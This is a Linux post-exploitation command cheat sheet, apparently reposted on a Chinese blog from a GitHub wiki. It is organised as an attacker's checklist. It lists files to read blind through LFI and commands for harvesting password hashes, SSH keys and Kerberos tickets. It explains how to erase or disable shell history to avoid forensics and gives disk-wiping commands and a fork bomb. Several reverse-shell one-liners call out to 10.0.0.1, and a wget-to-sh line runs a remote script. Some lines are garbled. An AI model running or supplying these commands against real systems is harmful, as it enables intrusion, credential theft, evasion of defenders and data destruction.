步骤如下
Collecting Information
Blind Files
System
Networking
User accounts
Obtain user's information
Credentials
Configs
Determine Distro
Installed Packages
Package Sources
Finding Important Files
Covering Your Tracks
Avoiding history filesmys
Deleting and Destroying
Escalating
Looking for possible opened paths
Maintaining control
Reverse Shell
Execute a Remote Script
Fun if Windows is present and accessible
Collecting Information
Blind Files
things to pull when all you can do is blindly read like in LFI/dir traversal (Don’t forget %00!)
| File | Contents and Reason |
|---|---|
| /etc/resolv.conf | Contains the current name servers (DNS) for the system. This is a globally readable file that is less likely to trigger IDS alerts than /etc/passwd |
| /etc/motd | Message of the Day |
| /etc/issue | current version of distro |
| /etc/passwd | List of local users |
| /etc/shadow | List of users’ passwords’ hashes (requires root) |
| /home/xxx/.bash_history | Will give you some directory context |
System
| Command | Description and/or Reason |
|---|---|
| uname -a | Prints the kernel version, arch, sometimes distro |
| ps aux | List all running processes |
| top -n 1 -d | Print process, 1 is a number of lines |
| id | Your current username, groups |
| arch, uname -m | Kernel processor architecture |
| w | who is connected, uptime and load avg |
| who -a | uptime, runlevel, tty, proceses etc. |
| gcc -v | Returns the version of GCC. |
| mysql --version | Returns the version of MySQL. |
| perl -v | Returns the version of Perl. |
| ruby -v | Returns the version of Ruby. |
| python --version | Returns the version of Python. |
| df -k | mounted fs, size, % use, dev and mount point |
| mount | mounted fs |
| last -a | Last users logged on |
| lastcomm | |
| lastlog | |
| lastlogin (BSD) | |
| getenforce | Get the status of SELinux (Enforcing, Permissive or Disabled) |
| dmesg | Informations from the last system boot |
| lspci | prints all PCI buses and devices |
| lsusb | prints all USB buses and devices |
| lscpu | prints CPU information |
| lshw | list hardware information |
| ex | |
| cat /proc/cpuinfo | |
| cat /proc/meminfo | |
| du -h --max-depth=1 / | note: can cause heavy disk i/o |
| which nmap | locate a command (ie nmap or nc) |
| locate bin/nmap | |
| locate bin/nc | |
| jps -l | |
| java -version | Returns the version of Java. |
Networking
| Command | Description and/or Reason |
|---|---|
| hostname -f | |
| ip addr show | |
| ip ro show | |
| ifconfig -a | |
| route -n | |
| cat /etc/network/interfaces | |
| iptables -L -n -v | |
| iptables -t nat -L -n -v | |
| ip6tables -L -n -v | |
| iptables-save | |
| netstat -anop | |
| netstat -r | |
| netstat -nltupw | root with raw sockets |
| arp -a | |
| lsof -nPi | |
| cat /proc/net/* | more discreet, all the information given by the above commands can be found by looking into the files under /proc/net, and this approach is less likely to trigger monitoring or other stuff |
User Accounts
| Command | Description and/or Reason |
|---|---|
| cat /etc/passwd | local accounts |
| cat /etc/shadow | password hashes on Linux |
| /etc/security/passwd | password hashes on AIX |
| cat /etc/group | groups (or /etc/gshadow) |
| getent passwd | should dump all local, LDAP, NIS, whatever the system is using |
| getent group | same for groups |
| pdbedit -L -w | Samba’s own database |
| pdbedit -L -v | |
| cat /etc/aliases | mail aliases |
| find /etc -name aliases | |
| getent aliases | |
| ypcat passwd | displays NIS password file |
Obtain user's information
ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home//.hist* # you can learn a lot from this
find /home//.vnc /home//.subversion -type f
grep ^ssh /home//.hist*
grep ^telnet `/home//.hist*
grep ^mysql /home//.hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not. readable, this sometimes works per user
crontab -l
cat /home/*/.mysql_history
sudo -p (allows the user to define what the password prompt will be, useful for fun customization with aliases or shell scripts)
Credentials
| File/Folder | Description and/or Reason |
|---|---|
| /home//.ssh/id | SSH keys, often passwordless |
| /tmp/krb5cc_* | Kerberos tickets |
| /tmp/krb5.keytab | Kerberos tickets |
| /home/*/.gnupg/secring.gpgs | PGP keys |
Configs
ls -aRl /etc/ * awk '$1 ~ /w.$/' * grep -v lrwx 2>/dev/nullte
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.confcda
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;
Determine Distro
| File | Description and/or Reason |
|---|---|
| uname -a | often hints at it pretty well |
| lsb_release -d | Generic command for all LSB distros |
| /etc/os-release | Generic for distros using “systemd” |
| /etc/issue | Generic but often modified |
| cat /etc/*release | |
| /etc/SUSE-release | Novell SUSE |
| /etc/redhat-release, /etc/redhat_version | Red Hat |
| /etc/fedora-release | Fedora |
| /etc/slackware-release, /etc/slackware-version | Slackware |
| /etc/debian_release, /etc/debian_version | Debian |
| /etc/mandrake-release | Mandrake |
| /etc/sun-release | Sun JDS |
| /etc/release | Solaris/Sparc |
| /etc/gentoo-release | Gentoo |
| /etc/arch-release | Arch Linux (file will be empty) |
| arch | OpenBSD; sample: “OpenBSD.amd64” |
Installed Packages
rpm -qa --last | head
yum list | grep installed
Debian
dpkg -l
dpkg -l | grep -i “linux-image”
dpkg --get-selections
{Free,Net}BSD: pkg_info
Solaris: pkginfo
Gentoo: cd /var/db/pkg/ && ls -d / # always works
Arch Linux: pacman -Q
Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf
Finding Important Files
ls -dlR */
ls -alR | grep ^d
find /var -type d
ls -dl `find /var -type d`
ls -dl `find /var -type d` | grep -v root
find /var ! -user root -type d -ls
find /var/log -type f -exec ls -la {} \;
find / -perm -4000 (find all suid files)
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; treels /home//.ssh/
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$ # Remember to updatedb before running locate
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home//id
.properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm /6000 -ls # find suids
locate rhosts
Also, check http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf for some one-liners that find world writable directories/files and more.
Covering Your Tracks
Avoiding history filesmys
export HISTFILE=
unset HISTFILE
This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out.
However if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes.
history -c
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null (invasive)
touch ~/.bash_history (invasive)
history -c (using a space before a command)
zsh% unset HISTFILE HISTSIZE
tcsh% set history=0
bash$ set +o history
ksh$ unset HISTFILE
find / -type f -exec {} (forensics nightmare)
Note that you’re probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$’ing the shell. Sometimes the shell can be configured to run ‘history -w’ after every command; get around this by overriding ‘history’ with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
Deleting and Destroying
If it is necessary to leave the machine inaccessible or unusable. Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.Oh, and you’re probably a jerk if you use any of the stuff below.
| File | Description and/or Reason |
|---|---|
| rm -rf / | This will recursively try to delete all files |
| mkfs.ext3 /dev/sda | Reformat the device mentioned, making recovery of files hard |
| dd if=/dev/zero of=/dev/sda bs=1M | Overwrite disk /dev/sda with zeros |
Hex version of rm -rf / (How is this supposed to work?)
char esp[] __attribute__ ((section(”.text”))) /* e.s.p release */ = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68\"
Fork Bomb: The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.
:(){:|:&};:
Escalating
Looking for possible opened paths
ls -alh /root/
sudo -l
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
lsof -nPi
ls /home//.ssh/
Maintaining control
Reverse Shell
Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 (No /dev/tcp on older Debians, but use nc, socat, TCL, awk or any interpreter like Python, and so on.).
perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1se
Listener- Xnest :1
Add permission to connect- xhost +victimIP
ssh -NR 3333:localhost:22 user@yourhost
nc -e /bin/sh 10.0.0.1 1234
Execute a Remote Script
wget http://server/file.sh -O- | sh
Fun if Windows is present and accessible
If there is Windows installed and the logged-in user access level includes those Windows partition, attacker can mount them up and do a much deeper information gathering, credential theft and root-ing. Ntfs-3g is useful for mounting ntfs partitions read-write.
TODO: insert details on what to look for
原文链接:https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List#system
长按下面的二维码,关注即可领取大量安全与IT资源
318
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
